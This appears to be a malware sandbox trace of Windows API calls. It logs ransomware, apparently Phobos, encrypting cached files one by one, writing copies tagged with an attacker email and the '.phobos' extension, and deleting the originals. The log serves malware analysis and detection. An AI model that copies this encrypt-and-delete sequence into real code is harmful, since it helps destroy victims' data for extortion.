[0196.323] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1437) returned 1 [0196.323] CloseHandle (hObject=0x14c) returned 1 [0196.323] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61")) returned 0x2024 [0196.323] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.323] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0196.323] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.323] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.323] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0196.324] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0196.324] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.324] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x59d, lpOverlapped=0x0) returned 1 [0196.361] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x5a0, dwBufLen=0x5a0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x5a0) returned 1 [0196.361] WriteFile (in: hFile=0x154, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x5a0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x5a0, lpOverlapped=0x0) returned 1 [0196.362] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32968) returned 1 [0196.362] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.362] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0196.362] CryptDestroyKey (hKey=0xa32968) returned 1 [0196.362] WriteFile (in: hFile=0x154, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0196.362] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.362] CloseHandle (hObject=0x14c) returned 1 [0196.362] CloseHandle (hObject=0x154) returned 1 [0196.362] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61")) returned 1 [0196.363] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0196.363] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0196.364] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1504) returned 1 [0196.364] CloseHandle (hObject=0x154) returned 1 [0196.364] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9")) returned 0x2024 [0196.364] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.364] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0196.364] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.364] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.364] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0196.365] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0196.365] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.365] ReadFile (in: hFile=0x154, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x5e0, lpOverlapped=0x0) returned 1 [0196.469] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x5f0, dwBufLen=0x5f0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x5f0) returned 1 [0196.469] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x5f0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x5f0, lpOverlapped=0x0) returned 1 [0196.470] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ae8) returned 1 [0196.470] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.470] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0196.470] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0196.470] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0196.470] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.470] CloseHandle (hObject=0x154) returned 1 [0196.470] CloseHandle (hObject=0x14c) returned 1 [0196.470] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9")) returned 1 [0196.471] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0196.471] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0196.631] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1618) returned 1 [0196.631] CloseHandle (hObject=0x17c) returned 1 [0196.631] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e")) returned 0x2024 [0196.631] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.631] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0196.631] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.631] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.631] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0196.631] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0196.632] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.632] ReadFile (in: hFile=0x17c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x652, lpOverlapped=0x0) returned 1 [0196.692] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x660, dwBufLen=0x660 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x660) returned 1 [0196.692] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x660, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x660, lpOverlapped=0x0) returned 1 [0196.694] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa327e8) returned 1 [0196.694] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.694] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0196.694] CryptDestroyKey (hKey=0xa327e8) returned 1 [0196.694] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0196.694] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.694] CloseHandle (hObject=0x17c) returned 1 [0196.694] CloseHandle (hObject=0x14c) returned 1 [0196.694] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e")) returned 1 [0196.695] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0196.695] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0196.695] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=471) returned 1 [0196.695] CloseHandle (hObject=0x14c) returned 1 [0196.696] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450")) returned 0x2024 [0196.696] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.696] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0196.696] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.696] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.696] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0196.697] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0196.697] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.697] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1d7, lpOverlapped=0x0) returned 1 [0196.697] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1e0, dwBufLen=0x1e0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1e0) returned 1 [0196.697] WriteFile (in: hFile=0x17c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1e0, lpOverlapped=0x0) returned 1 [0196.698] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa327e8) returned 1 [0196.698] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.698] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0196.698] CryptDestroyKey (hKey=0xa327e8) returned 1 [0196.698] WriteFile (in: hFile=0x17c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0196.698] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.698] CloseHandle (hObject=0x14c) returned 1 [0196.698] CloseHandle (hObject=0x17c) returned 1 [0196.699] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450")) returned 1 [0196.699] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0196.699] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0196.700] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1518) returned 1 [0196.700] CloseHandle (hObject=0x17c) returned 1 [0196.701] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001")) returned 0x2024 [0196.701] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.701] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0196.701] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.701] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, 